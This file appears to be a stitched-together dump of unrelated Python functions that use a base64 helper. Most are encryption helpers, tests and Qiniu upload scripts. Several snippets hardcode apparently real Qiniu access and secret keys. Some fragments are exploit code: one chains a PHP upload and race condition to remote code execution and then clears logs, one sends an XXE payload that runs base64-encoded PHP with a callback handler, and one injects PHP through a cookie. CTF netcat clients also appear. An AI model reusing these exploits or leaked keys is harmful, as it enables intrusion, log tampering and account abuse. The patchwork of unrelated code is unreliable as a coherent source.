def qiniufetch(url, bucket, filename): """调用七牛的fetch API 将url的图片存储到七牛""" from base64 import urlsafe_b64encode as b64e from qiniu.auth import digest access_key = "Mm3eTLInPMoWnh2uBpZ8MarSQw1esZdaCmQgqapu" secret_key = "3msmgC6ZISF9tjJcXsYZcr10tOjG13fX0-pdtMKb" encoded_url = b64e(url) dest_entry = "%s:%s" % (bucket, filename) encoded_entry = b64e(dest_entry.encode('utf-8')) api_host = "iovip.qbox.me" api_path = "/fetch/%s/to/%s" % (encoded_url, encoded_entry) mac = digest.Mac(access=access_key, secret=secret_key) client = digest.Client(host=api_host, mac=mac) ret, err = client.call(path=api_path) if err is not None: print "Fetch image file\"%s\" failed" % url print err return None else: print "Fetch \"%s\" to qiniu \"%s\" success!" % (url, dest_entry) return "http://%s.qiniudn.com/%s" % (bucket, quote(filename.encode('utf-8'))) pass
def new_passphrase(config, passphrase, salt=None): if salt is None: salt = Random.new().read(8) # 64-bit salt pbkdf2 = PBKDF2(passphrase, salt, iterations=1 << 14) config['passphrase_salt'] = b64e(salt) config['passphrase_aes_key'] = b64e(pbkdf2.read(32)) # AES256 config['passphrase_sha256hmac_key'] = b64e(pbkdf2.read(SHA256.digest_size))
def qiniufetch(url,bucket,filename): """调用七牛的fetch API 将url的图片存储到七牛""" from base64 import urlsafe_b64encode as b64e from qiniu.auth import digest access_key = "qS-5BhmoJIM5WITHYwzooxlTiT70vWP9fyNXd_fT" secret_key = "5JOR1EiOXN-pbqvNoAf4v4YLmnSMB2rvqy13u3f5" encoded_url = b64e(url) dest_entry = "%s:%s" % (bucket, filename) encoded_entry = b64e(dest_entry.encode('utf-8')) api_host = "iovip.qbox.me" api_path = "/fetch/%s/to/%s" % (encoded_url, encoded_entry) mac = digest.Mac(access=access_key, secret=secret_key) client = digest.Client(host=api_host, mac=mac) ret, err = client.call(path=api_path) if err is not None: print "Fetch image file\"%s\" failed" % url print err return None else: print "Fetch \"%s\" to qiniu \"%s\" success!" % (url,dest_entry) return "http://%s.qiniudn.com/%s" % (bucket,urllib.quote(filename.encode('utf-8')))
def qiniufetch(url,bucket,filename): """调用七牛的fetch API 将url的图片存储到七牛""" from base64 import urlsafe_b64encode as b64e from qiniu.auth import digest access_key = "Mm3eTLInPMoWnh2uBpZ8MarSQw1esZdaCmQgqapu" secret_key = "3msmgC6ZISF9tjJcXsYZcr10tOjG13fX0-pdtMKb" encoded_url = b64e(url) dest_entry = "%s:%s" % (bucket, filename) encoded_entry = b64e(dest_entry.encode('utf-8')) api_host = "iovip.qbox.me" api_path = "/fetch/%s/to/%s" % (encoded_url, encoded_entry) mac = digest.Mac(access=access_key, secret=secret_key) client = digest.Client(host=api_host, mac=mac) ret, err = client.call(path=api_path) if err is not None: print "Fetch image file\"%s\" failed" % url print err return None else: print "Fetch \"%s\" to qiniu \"%s\" success!" % (url,dest_entry) return "http://%s.qiniudn.com/%s" % (bucket,quote(filename.encode('utf-8'))) pass
def sendKeys(S, E): raw = nc.read_until(b">>> ") nc.write(b'2\n') nc.read_until(b'S_a = ') nc.write(b64e(compress(S.tobytes())) + b'\n') nc.read_until(b'E_a = ') nc.write(b64e(compress(E.tobytes())) + b'\n') print(nc.read())
def init(config, crypto='aes'): if 'crypto' in config: crypto = config['crypto'] config['crypto'] = crypto rng = Random.new() if 'aes_key' not in config: config['aes_key'] = b64e(rng.read(32)) # AES256 if 'sha256hmac_key' not in config: config['sha256hmac_key'] = b64e(rng.read(SHA256.digest_size))
def flag_generator(): flag = "CBA{Reverse_engineering_is_awesome!}" flag = flag.encode('zlib') for i in range(randint(0, 10)): flag = b64e(flag) return b64e(flag)
def password_encrypt(self, message: bytes, iterations: int) -> bytes: """ Symmetric encryption leveraging Fernet. Use the salt and iterations to encrypt the message. """ salt = secrets.token_bytes(self.default_salt_bytes) key = self.derive_key(salt, iterations) return b'~'.join([ b64e(salt), b64e(iterations.to_bytes(int(log(iterations, 256)) + 1, 'big')), Fernet(key).encrypt(message) ])
def testKeys(U, C, keyB): raw = nc.read_until(b">>> ") nc.write(b'1\n') nc.read_until(b'U = ') nc.write(b64e(compress(U.tobytes())) + b'\n') nc.read_until(b'C = ') nc.write(b64e(compress(C.tobytes())) + b'\n') nc.read_until(b'key_b = ') nc.write(b64e(compress(keyB.tobytes())) + b'\n') ret = nc.read_until(b'\n').decode() return 'Success' in ret
def login(): name = request.form['username'] app.logger.info("LOGIN: %s" % (name)) client_key = key_for(name) if client_key is None: app.logger.warn("No key exists for user %s. User may not be registered." % name) abort(401) secret = auth.generate_secret() p1 = auth.encrypt(secret, client_key) p2 = auth.encrypt(secret, auth.key()) return json.dumps({'client_secret': b64e(p1), 'server_secret': b64e(p2)})
def try_kex(U, C, kb): send_str('1') get_until_prompt(b'U = ') sock.send(b64e(compress(U.tobytes())) + b'\n') get_until_prompt(b'C = ') sock.send(b64e(compress(C.tobytes())) + b'\n') get_until_prompt(b'key_b = ') sock.send(b64e(compress(kb.tobytes())) + b'\n') lines = get_until_prompt().splitlines() if lines[0] == 'Failure.': return False if lines[0] == 'Success, the server and the client share the same key!': return True assert 0
def _derive_key(password, salt, iterations=iterations): kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=salt, iterations=iterations, backend=backend) return b64e(kdf.derive(password))
def decrypt(cls, value): from django.conf import settings decoded = b64d(value.encode()) salt, encrypted_value = decoded[:16], b64e(decoded[16:]) key = cls.get_key(force_bytes(settings.SECRET_KEY), salt) return Fernet(key).decrypt(encrypted_value).decode()
def obscure(data: bytes) -> bytes: """ Obscure data bytes to unreadable bytes :param data: Data bytes to obscure :return: Obscured data bytes """ return b64e(compress(data, 9))
def password_encrypt(message: bytes, password: str, iterations: int = iterations) -> bytes: salt = secrets.token_bytes(16) key = _derive_key(password.encode(), salt, iterations) return b64e(b'%b%b%b' % (salt, iterations.to_bytes( 4, 'big'), b64d(Fernet(key).encrypt(message))))
def decrypt_value(secret: str, encrypted_value: str) -> str: decoded = b64d(encrypted_value) salt, iter, token = decoded[:16], decoded[16:20], b64e(decoded[20:]) iterations = int.from_bytes(iter, 'big') key = PasswordsEncryption._derive_key(secret.encode(), salt) initial_data = Fernet(key).decrypt(token) return initial_data.decode()
def do_pubkey(self, data): print "Generating RSA key..." #self.rsa = RSA.generate(4096) # If you find p and q which this is fast for, put them in here. #p, q = Crypto.Util.number.getPrime(2048), Crypto.Util.number.getPrime(2048) #379, Crypto.Util.number.getPrime(4095) #e = 1 #N = p*q #d = Crypto.Util.number.inverse(e, (q-1)*(p-1)) num_cop = 20 bits = (4096 // num_cop) + 2 #ps = [Crypto.Util.number.getPrime(bits) for i in range(x)] ps = [gmpy2.mpz(Crypto.Util.number.getPrime(bits)) for i in range(num_cop)] e = gmpy2.mpz(Crypto.Util.number.getPrime(32)) N = 1 for x in ps: N *= x #next x #print('e', e, len(hex(e)[2:]) * 4) self.v = four1c2.fuckedRSA(ps, e) print('e=', self.v.e, len(hex(self.v.e)[2:])*4) self.rsa = RSA.construct((long(N), long(self.v.e), long(self.v.d))) pub = self.rsa.publickey() self.state = 'challange' self.sendLine(b64e(pub.exportKey(format='DER')))
def decrypt(self, ctext: str, password: str) -> str: ctext = ctext.encode() decoded = b64d(ctext) salt, iter, ctext = decoded[:16], decoded[16:20], b64e(decoded[20:]) iterations = int.from_bytes(iter, "big") key = self._derive_key(password.encode(), salt, iterations) return Fernet(key).decrypt(ctext).decode()
def encrypt_data(jd: dict, time: int) -> dict: ''' 生成加密请求体 参数: jd: 明文请求体 time: 整数时间戳 返回: dict: 密文请求体 ''' sjd = json.dumps(jd, separators=(',', ':')) zjd = gzip.compress(sjd.encode('utf-8')) zjd = b'\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00' + zjd[10:] des_key = gen_random_str(8) des_unit = pyDes.des(des_key, pyDes.CBC, DES_IV, pad=None, padmode=pyDes.PAD_PKCS5) des_enc = des_unit.encrypt(zjd) des_enc = b64e(des_enc).decode('utf-8') rsa_enc = rsa_encrypt(des_key) s_rsa = md5_calc(f'{rsa_enc}{time}') s_des = md5_calc(des_enc) ejd = {'data': des_enc, 'key': rsa_enc, 'sid': f'{s_rsa}{s_des}'} return (ejd)
def password_decrypt(token: str, password: str) -> str: token = token.encode() decoded = b64d(token) salt, iter, token = decoded[:16], decoded[16:20], b64e(decoded[20:]) iterations = int.from_bytes(iter, 'big') key = _derive_key(password.encode(), salt, iterations) return Fernet(key).decrypt(token).decode()
def encrypt(cls, value): from django.conf import settings salt = secrets.token_bytes(16) key = cls.get_key(force_bytes(settings.SECRET_KEY), salt) encrypted_value = b64d(Fernet(key).encrypt(value.encode())) return b64e(b"%b%b" % (salt, encrypted_value)).decode()
def decrypt_message(crypted_data, passphrase): """Decrypt secret with passphrase.""" decoded = b64d(crypted_data) salt, iter, crypted_data = decoded[:16], decoded[16:20], b64e(decoded[20:]) iterations = int.from_bytes(iter, 'big') key = _derive_key(passphrase.encode(), salt, iterations) return Fernet(key).decrypt(crypted_data).decode('utf-8')
def write_key_to_file(key): """ Write new HMACing key """ try: with open(KEY_FILE, 'wb') as key_file: key_file.write(b64e(key)) except: logging.warning("error writing to key file")
def _derive_key(passphrase, salt, iterations=100_000): """Derive a secret key from a given passphrase and salt.""" kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=salt, iterations=iterations, backend=default_backend()) return b64e(kdf.derive(passphrase))
def pwd_encrypt(message: (str, bytes), pwd: str, i: int = 100_000) -> bytes: message = message if isinstance(message, bytes) else message.encode('utf-8') zout = secrets.token_bytes(16) key = __derive_key(pwd.encode(), zout, i) return b64e( b'%b%b%b' % (zout, i.to_bytes(4, 'big'), b64d(Fernet(key).encrypt(message))))
def _derive_key(password: bytes, salt: bytes, iterations: int) -> bytes: """Derive a secret key from a given password and salt""" kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=salt, iterations=iterations, backend=backend) return b64e(kdf.derive(password))
def sign_message(self, message, key_file, signature_name): private_key = self.__load_private_key_from_file(key_file) signature = private_key.sign( message.encode(), padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH), hashes.SHA256()) signature_file = open(f"{signature_name}.sig", "w+") signature_file.write(b64e(signature).decode())
def handle_put(self, conn, body=None, length=None, mime=None, name=None): droid.log("Got %s" % name) droid.eventPost("taxi-server", json.dumps({ "name": "got-content", "body": b64e(body), "length": length, "mime": mime or mimetypes.guess_type(name)[0], "file": name }))
def value_encrypt(message: bytes, password: str, iterations: int) -> bytes: salt = os.urandom(16) key = _derive_key(password.encode(), salt, iterations) print("Key is: %s" % (key, )) return b64e(b'%b%b%b' % ( salt, iterations.to_bytes(4, 'big'), b64d(Fernet(key).encrypt(message)), ))
def get_key(secret, salt): return b64e( PBKDF2HMAC( algorithm=hashes.SHA256(), length=32, salt=salt, iterations=100000, backend=default_backend(), ).derive(secret))
def encrypt_message(message, passphrase, iterations=100_000): """Encrypt secret with passphrase.""" salt = secrets.token_bytes(16) key = _derive_key(passphrase.encode(), salt, iterations) return b64e(b'%b%b%b' % ( salt, iterations.to_bytes(4, 'big'), b64d(Fernet(key).encrypt(message)), ))
def password_encrypt(message: bytes, key: bytes) -> bytes: current_time = int(time.time()).to_bytes(8, 'big') algorithm = algorithms.AES(key) iv = secrets.token_bytes(algorithm.block_size // 8) cipher = Cipher(algorithm, modes.GCM(iv), backend=backend) encryptor = cipher.encryptor() encryptor.authenticate_additional_data(current_time) ciphertext = encryptor.update(message) + encryptor.finalize() return b64e(current_time + iv + ciphertext + encryptor.tag)
def derive_key(self, salt: bytes, iterations: int) -> bytes: """ Also known as key stretching, we compute the key with a salt and any number of iterations to generate a derived key. """ kdf = PBKDF2HMAC( algorithm=hashes.SHA256(), length=32, salt=salt, iterations=iterations, backend=self.backend) return b64e(kdf.derive(self.passphrase.encode()))
def password_decrypt(self, token: bytes, password: str) -> bytes: decoded = b64d(token) salt, iter, token = decoded[:16], decoded[16:20], b64e(decoded[20:]) iterations = int.from_bytes(iter, 'big') key = self._derive_key(password.encode(), salt, iterations) try: data = Fernet(key).decrypt(token) except InvalidToken as e: return None return Fernet(key).decrypt(token)
def _generate_messages(self, count): messages = [] for i in range(1, count + 1): messages.append({ 'ackId': '%s' % i, 'message': { 'data': b64e('Message {}'.format(i).encode('utf8')), 'attributes': {'type': 'generated message'} } }) return messages
def encrypt(self, text: str, password: str, iterations: int = None) -> str: if iterations is None: iterations = self.iterations assert isinstance(iterations, int) salt = secrets.token_bytes(16) key = self._derive_key(password.encode(), salt, iterations) return b64e(b"%b%b%b" % ( salt, iterations.to_bytes(4, "big"), b64d(Fernet(key).encrypt(text.encode())), )).decode()
def start_pain_train(t, s): if we_can_set_settings(t, s): print "(+) updated the settings!" if we_can_upload(t, s): print "(+) wrote php code!" print "(+) attempting race condition..." r = Thread(target=race, args=(t,)) r.start() if we_won_race(t, s, r): print "(+) won the race!" if we_can_exec_php(t, b64e('`rm pwn.php`;echo "pwn";')): print "(+) rce is proven!" if we_can_clean_up(t, s) and we_can_clear_logs(t, s): print "(+) deleted the image and scrubbed the logs!" exec_code(t)
def send_message(name, msg): keyA, body = auth.aes_encrypt(msg) body = b64e(body) recipient_key = key_for(name) if recipient_key is None: return False keyA2 = keyA keyA = b64e(auth.encrypt(keyA, recipient_key)) keyA2 = b64e(auth.encrypt(keyA2, auth.public_key())) payload = {'sender': username, 'recipient': name, 'body': body, 'key': keyA, 'sender_key': keyA2} sig = b64e(str(auth.sign(username+name+body))) payload['signature'] = str(sig) keyB, payload = auth.aes_encrypt(json.dumps(payload)) payload = b64e(payload) keyB = b64e(auth.encrypt(keyB, auth.server_key())) post("messages", {'key': keyB, 'payload': payload})
# coding=utf-8 import sys sys.path.insert(0, "../../") from base64 import urlsafe_b64encode as b64e from qiniu.auth import digest access_key = "" secret_key = "" src_url = "" dest_bucket = "" dest_key = "" encoded_url = b64e(src_url) dest_entry = "%s:%s" % (dest_bucket, dest_key) encoded_entry = b64e(dest_entry) api_host = "iovip.qbox.me" api_path = "/fetch/%s/to/%s" % (encoded_url, encoded_entry) mac = digest.Mac(access=access_key, secret=secret_key) client = digest.Client(host=api_host, mac=mac) ret, err = client.call(path=api_path) if err is not None: print "failed" print err else: print "success"
def parsestr(userarg): userpass=userarg.split(':') if len(userpass)==1: pwd=self.console.prompt('Enter host password for user \'%s\': '%userpass[0],1) userpass.append(pwd) return b64e(':'.join(userpass))[:-1]
def suntzu_omfg_no_one_can_steal_my_software_yo(): handlerthr = Thread(target=handler, args=(lp,)) handlerthr.start() target = "http://127.0.0.1/openadmin/conf/config.php?c=eval%%28base64_decode%%28%%27%s%%27%%29%%29%%3b" % b64e(build_php_code()) p = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"%s\" >]><foo>&xxe;</foo>" % target f = [('importfile', ('suntzu-rgod-is-so-elite', p, 'text/plain'))] r = requests.post("%s" % t, files=f)
def login(): global cookie resp = post("login", {'username': username}) if resp.status_code != 200: return False data = json.loads(resp.text) client_secret = b64d(data['client_secret']) secret = auth.decrypt(client_secret) sig = auth.sign(secret) resp = post("authorise", {'username': username, 'server_secret': data['server_secret'], 'signature': b64e(str(sig))}) if resp.status_code == 200: cookie = resp.cookies return True return False
def exec_code(target): handlerthr = Thread(target=handler, args=(cb_port,)) handlerthr.start() we_can_exec_php(target, b64e(build_php_code()))
def hex_to_b64(h): return b64e(unhexlify(h))
try: from unittest import mock except ImportError: try: import mock except ImportError: mock = None TASK_ID = 'test-task-id' TEST_PROJECT = 'test-project' TEST_TOPIC = 'test-topic' TEST_SUBSCRIPTION = 'test-subscription' TEST_MESSAGES = [ { 'data': b64e(b'Hello, World!'), 'attributes': {'type': 'greeting'} }, {'data': b64e(b'Knock, knock')}, {'attributes': {'foo': ''}}] TEST_POKE_INTERVAl = 0 class PubSubTopicCreateOperatorTest(unittest.TestCase): @mock.patch('airflow.contrib.operators.pubsub_operator.PubSubHook') def test_failifexists(self, mock_hook): operator = PubSubTopicCreateOperator(task_id=TASK_ID, project=TEST_PROJECT, topic=TEST_TOPIC, fail_if_exists=True)
def exec_code(): phpkodez = b64e(build_php_code()) handlerthr = Thread(target=handler, args=(lport,)) handlerthr.start() requests.get("%s/d4d/offsec.php" % (target), cookies={"awae": phpkodez})
# coding=utf-8 import sys sys.path.insert(0, "../../") from base64 import urlsafe_b64encode as b64e from qiniu.auth import digest access_key = "" secret_key = "" bucket = "" key = "" entry = "%s:%s" % (bucket, key) encoded_entry = b64e(entry) api_host = "iovip.qbox.me" api_path = "/prefetch/%s" % (encoded_entry) mac = digest.Mac(access=access_key, secret=secret_key) client = digest.Client(host=api_host, mac=mac) ret, err = client.call(path=api_path) if err is not None: print "failed" print err else: print "success"